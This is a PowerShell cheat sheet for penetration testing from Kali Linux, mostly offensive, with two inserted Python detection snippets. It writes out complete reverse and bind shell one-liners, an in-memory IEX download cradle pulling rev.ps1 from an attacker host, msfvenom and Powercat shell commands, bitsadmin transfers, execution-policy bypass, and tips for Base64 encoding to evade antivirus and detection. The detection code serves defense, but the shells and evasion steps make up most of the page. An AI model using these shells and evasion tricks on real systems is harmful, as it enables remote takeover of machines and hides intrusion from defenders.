Powershell Cheat Sheet

Cheat sheet and tricks for the Powershell programming language.

NOTE: The Windows PowerShell Integrated Scripting Environment (ISE) is no longer in active development. Use Visual Studio Code with the PowerShell Extension instead.

See also PowerShell Empire, PowerView.

PowerShell under Kali Linux

Already installed in Kali Linux.

pwsh

Update Help commands

Update-Help

Test

Get-Process -Name sshd*

Set Execution Policy

Before running a PowerShell script, the right execution policy must be set. Open a CMD window as an administrator (Run as administrator).

powershell Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser

Remove all restrictions

powershell Set-ExecutionPolicy Unrestricted

Remove all restrictions for the current user

powershell Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

Show policies

powershell Get-ExecutionPolicy -List

Encoding

TIP: Encode commands to evade detection. See Pulling Back the Curtains on EncodedCommand PowerShell Attacks

Encode a command in base64

IMPORTANT: Command needs to be encoded as UTF-16-LE, then converted to Base64.

Using CyberChef, build the recipe Encode text with UTF-16LE (1200), then To Base64.

On Unix:

printf 'dir c:\\' | iconv -t UTF-16LE | base64

Using Powershell:

powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('dir c:\\'))

Execute a command encoded in base 64

powershell -ENC ZABpAHIAIABjADoAXABcAA==
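Defender-side counterpart to the encoding steps above (an added example, not code from the original cheat sheet): it pulls the encoded argument out of a logged command line, reverses the UTF-16LE + Base64 steps, and round-trips the page's own `dir c:\\` value. The sample command line is constructed; the accepted flag spellings follow powershell.exe's rule that any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...) is accepted.

```python
import base64
import re
from typing import Optional

# Constructed sample command line in the style of a process-creation log entry;
# not taken from the original page.
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -enc ZABpAHIAIABjADoAXABcAA=="

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so a detector has to match all of them; longest first keeps the alternation tidy.
_PREFIXES = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}, key=len, reverse=True)
_ENC_ARG = re.compile(
    r"(?:^|\s)[-/](?:" + "|".join(_PREFIXES) + r")\s+([A-Za-z0-9+/=]{4,})",
    re.IGNORECASE,
)


def encode_command(command: str) -> str:
    """Encode the way the page describes: UTF-16LE bytes, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> Optional[str]:
    """Reverse the encoding; None for malformed Base64 or an odd byte count."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
        return None


def extract_and_decode(cmdline: str) -> Optional[str]:
    """Find an encoded-command argument in a logged command line and decode it."""
    match = _ENC_ARG.search(cmdline)
    if not match:
        return None
    return decode_encoded_command(match.group(1))


if __name__ == "__main__":
    print(extract_and_decode(SAMPLE_CMDLINE))  # dir c:\\
```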

File Transfer

Download using HTTP

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://IP/file.txt','C:\Users\' + $Env:USERNAME + '\Desktop\file.txt')"

Download using HTTPS source

powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
(new-object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt','C:\Users\' + $Env:USERNAME + '\Desktop\quebec.txt')

Bind Shell

Client -> Bind shell -> Server

To validate, NOT TESTED

Server mode (victim, Windows)

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

Client mode (Kali)

nc -nv <WINDOWS IP> 443

Reverse Shell

Send a command shell to a host listening on a port.

Msfvenom

msfvenom -l payloads | grep -i powershell
cmd/windows/powershell_bind_tcp                     Interacts with a powershell session on an established socket connection
cmd/windows/powershell_reverse_tcp                  Interacts with a powershell session on an established socket connection
cmd/windows/reverse_powershell                      Connect back and create a command shell via Powershell
windows/powershell_bind_tcp                         Listen for a connection and spawn an interactive powershell session
windows/powershell_reverse_tcp                      Listen for a connection and spawn an interactive powershell session
windows/x64/powershell_bind_tcp                     Listen for a connection and spawn an interactive powershell session
windows/x64/powershell_reverse_tcp                  Listen for a connection and spawn an interactive powershell session

To validate, NOT TESTED

# To validate...
msfvenom -p windows/powershell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe > windows_shell.exe
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT > shell.bat
msfconsole
use multi/handler
set payload cmd/windows/reverse_powershell 
set lhost X.X.X.X
set lport 443
run

On Kali (listener)

sudo nc -lnvp 443

On Windows (victim)

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<KALI IP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Rev shell – In memory

Working 🙂 The victim will download the payload and execute it in memory.

Kali

rev.ps1

$client = New-Object System.Net.Sockets.TCPClient('<KALI IP>',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Distribute rev.ps1

python3 -m http.server 80

Victim (Windows)

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://<KALI IP>/rev.ps1')
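Detection-side counterpart (an added example, not part of the original cheat sheet) for the in-memory cradle above and for the TCPClient/TcpListener shells in the Reverse Shell and Bind Shell sections. It classifies script-block text of the kind PowerShell script block logging (Event ID 4104) records, where downloaded and evaluated code appears in clear, so no Base64 handling is needed. The sample script blocks are constructed and keep the page's `<KALI IP>` placeholders as placeholders.

```python
import re
from typing import List

# Constructed script-block texts modelled on what script block logging (Event ID 4104)
# records; not taken from a real system. Placeholders are deliberate.
SAMPLE_SCRIPT_BLOCKS = [
    "IEX (New-Object System.Net.WebClient).DownloadString('http://<KALI IP>/rev.ps1')",
    "$client = New-Object System.Net.Sockets.TCPClient('<KALI IP>',8080);$stream = $client.GetStream()",
    "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();"
    "$client = $listener.AcceptTcpClient();$stream = $client.GetStream()",
    "Get-Process -Name sshd*",
    "Get-Content C:\\logs\\app.log -Tail 5 -Wait",
]

# Indicator name -> case-insensitive pattern, each drawn from the cradle, reverse-shell
# and bind-shell snippets in this cheat sheet.
INDICATORS = {
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web_download": re.compile(r"\bSystem\.Net\.WebClient\b.*\bDownload(?:String|File)\b", re.I | re.S),
    "tcp_client": re.compile(r"\bSystem\.Net\.Sockets\.TcpClient\b", re.I),
    "tcp_listener": re.compile(r"\bSystem\.Net\.Sockets\.TcpListener\b", re.I),
    "raw_stream": re.compile(r"\.GetStream\(\)", re.I),
}


def classify_script_block(text: str) -> List[str]:
    """Return the names of every indicator present in one script block."""
    return [name for name, pat in INDICATORS.items() if pat.search(text)]


def is_download_cradle(text: str) -> bool:
    """The in-memory pattern: fetch over HTTP and evaluate without writing to disk."""
    hits = classify_script_block(text)
    return "invoke_expression" in hits and "web_download" in hits


def is_shell_over_socket(text: str) -> bool:
    """Either shell direction: a raw TCP client or listener whose stream is read."""
    hits = classify_script_block(text)
    return ("tcp_client" in hits or "tcp_listener" in hits) and "raw_stream" in hits


if __name__ == "__main__":
    for block in SAMPLE_SCRIPT_BLOCKS:
        print(classify_script_block(block), block[:60])
```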

Examples

PowerShell version

powershell $PSVersionTable

Remote session (see https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enter-pssession?view=powershell-7.2)

powershell
Enter-PSSession -ComputerName Server01

# Display file content
powershell Get-Content /home/file1.txt

# Display content "live"
powershell get-content /home/file1.txt -tail 5 -wait

# List command history
powershell Get-History

# Display environment variables
Set-Location Env:
Get-ChildItem

# Display a specific environment variable
Get-ChildItem Env:Computername

# Escaping Powershell Restricted Environment
Type !

# Check execution policy for scripts (Restricted or Bypass)
Get-ExecutionPolicy

# Bypass execution policy for scripts
powershell -ep bypass

# Import a script
Import-Module .\get-indexeditem.ps1

# Search files with Windows Search Index (enabled by default)
Get-IndexedItem -Filter ""

# Kill a process by name
Stop-Process -Name "ProcessName" -Force

# Kill a process by PID
Stop-Process -Id <PID> -Force

# Test network connection
powershell Test-NetConnection proxy.example.com -Port 8080

Loop on results

$list = Get-WmiObject Win32_Service | Select-Object Name, State, PathName | Where-Object { $_.State -eq 'Running' }

# Only the selected properties (Name, State, PathName) exist on each item
foreach ($item in $list) {
    Write-Host ("{0} {1}" -f $item.Name, $item.PathName)
}

Powercat

Powershell version of Netcat.

Download

Distribute Powercat from Kali

sudo cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 /var/www/html
sudo service apache2 start

On Windows

See File Transfer for more options.

bitsadmin /create JOB & bitsadmin /addfile JOB http://<KALI IP>/powercat.ps1 C:\Users\%USERNAME%\Desktop\powercat.ps1 & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB

Usage examples

Set the execution policy to Unrestricted.

Load Powercat

IMPORTANT: Some antivirus products block Powercat.

powershell
. C:\Users\someuser\Desktop\powercat.ps1

Help

powercat -h

File transfer

Send file from Windows using Powercat

powercat -c <KALI IP> -p 443 -i C:\Users\someuser\Desktop\powercat.ps1

Receive file on Kali

sudo nc -lnvp 443 > powercat.ps1
[Ctrl+C]

Reverse shell

Server mode (Kali)

sudo nc -lnvp 443

Client mode (Windows sends reverse shell)

powercat -c <KALI IP> -p 443 -e cmd.exe

Client mode (Windows, using a stand-alone base64-encoded payload)

NOTE: Without encoding, the payload will be detected by antivirus.

powercat -c <KALI IP> -p 443 -e cmd.exe -ge > revshell.ps1
powershell.exe -E <generated base64 payload>

Bind shell

On Windows

powercat -l -p 443 -e cmd.exe

On Windows – stand-alone base64-encoded payload

powercat -l -p 443 -e cmd.exe -ge > bindshell.ps1
powershell.exe -E <generated base64 payload>

On Kali

nc <WINDOWS IP> 443